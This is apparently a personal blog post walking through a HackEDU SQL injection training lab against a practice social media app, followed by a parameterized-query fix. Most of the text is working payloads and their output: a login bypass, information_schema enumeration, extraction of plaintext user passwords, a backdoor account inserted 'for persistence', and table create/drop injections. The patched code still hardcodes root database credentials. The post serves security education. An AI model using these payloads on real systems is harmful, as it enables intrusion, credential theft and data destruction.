sql injection:

This below is the tutorial of HackEDU sql injection:

This below is the link for the HackEDU:

Inject the username and password field as shown below:

x’or’1=1

Okay now we got into the database with some user login, after that how can we see any admin usernames or admin passwords: After login, we see this below page:

Now let us see the post request while updating posts.

If the username contains quotations it is giving internal server error, try something without the quotes as just x.

As we see it is taking username and the update try giving the below in the post request.

User_name', (SELECT database()))#

SocialMediaApp: User_name

User_name', (SELECT table_name FROM information_schema.tables where table_schema='SocialMediaApp' LIMIT 1))#

Answer is:

tbl_update: a

a', (SELECT table_name FROM information_schema.tables where table_schema='SocialMediaApp' LIMIT 1 OFFSET 1))#

Answer is:

tbl_user: a

a', (SELECT table_name FROM information_schema.tables where table_schema='SocialMediaApp' LIMIT 1 OFFSET 2))#

Answer is:

None: a — It means no more tables, now we will see column names of any tables.

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1))#

Answer is : user_id: padma

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1 OFFSET 1))#

Answer is : user_username: padma

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1 OFFSET 2))#

Answer is:

user_password: padma

padma', (SELECT column_name FROM information_schema.columns where table_schema='SocialMediaApp' and table_name='tbl_user' LIMIT 1 OFFSET 3))#

None: padma

This means no more columns present in the table. As we got the column names now we will try to get the data.

First we will get the user_id data and user_username data

padma’, (SELECT user_id FROM tbl_user LIMIT 1))#
padma’, (SELECT user_id FROM tbl_user LIMIT 1 OFFSET 1))#
padma’, (SELECT user_id FROM tbl_user LIMIT 1 OFFSET 2))#
padma’, (SELECT user_id FROM tbl_user LIMIT 1 OFFSET 3))#
padma’, (SELECT user_username FROM tbl_user LIMIT 1))#
padma’, (SELECT user_username FROM tbl_user LIMIT 1 OFFSET 1))#
padma’, (SELECT user_username FROM tbl_user LIMIT 1 OFFSET 2))#
padma’, (SELECT user_username FROM tbl_user LIMIT 1 OFFSET 3))#

The answers for this are:

16: padma

17: padma

18: padma

None: padma

The answers for usernames:

alice: padma

bob: padma

eve: padma

None: padma

Then we will try to get the passwords with below command:

padma', (SELECT user_password FROM tbl_user LIMIT 1))#
padma', (SELECT user_password FROM tbl_user LIMIT 1 OFFSET 1))#
padma', (SELECT user_password FROM tbl_user LIMIT 1 OFFSET 2))#
padma', (SELECT user_password FROM tbl_user LIMIT 1 OFFSET 3))#

The answers for this are:

monkey1: padma

password: padma

password123: padma

None: padma

Now let us try to login with some user credentials

alice and monkey1

bob and password

eve and password123

Now, we will try to create a user with username as padma and password padma for persistence by joining insert into sql command.

a', '1'); INSERT INTO tbl_user VALUES (19, 'padma','padma')#

How will we know whether it is a success, if the post is added and try to login with padma and padma.

Can we create a table?

a', '1'); create table hacker(hackername varchar(10))#

It got created; also can we delete also?

a’, ‘1’); drop table hacker#

Use parametrized sql statements instead of directly concatenating sql statements.

import os
import pymysql

def login(username, password):
conn = pymysql.connect(host=’mysql’, port=3306, user=’root’, passwd=’letmein’, db=’SocialMediaApp’)
cursor = conn.cursor()

cursor.execute(“SELECT * from tbl_user WHERE user_username = %s AND user_password= %s”,(username,password))
data = cursor.fetchall()

conn.commit()
cursor.close()
conn.close()

if len(data) is 0:
return False
return True

def add_post(post, username):
conn = pymysql.connect(host=’mysql’, port=3306, user=’root’, passwd=’letmein’, db=’SocialMediaApp’)
cursor = conn.cursor()

statement = “INSERT INTO tbl_update VALUES (%s,%s);”
input=(post,username)

cursor.execute(statement,input)
conn.commit()
cursor.close()
conn.close()

The above lines in bold are patched to give them as parameterized.

Now try doing the above sql injections.

Now we see as below it is inserted as a string instead of sql injection.

Preventing sql injection is easy, just follow safe ways to insert data.

--

--

--

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
dl padmavathi

dl padmavathi

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu

More from Medium

WebDriver Architecture Selenium — StudySection Blog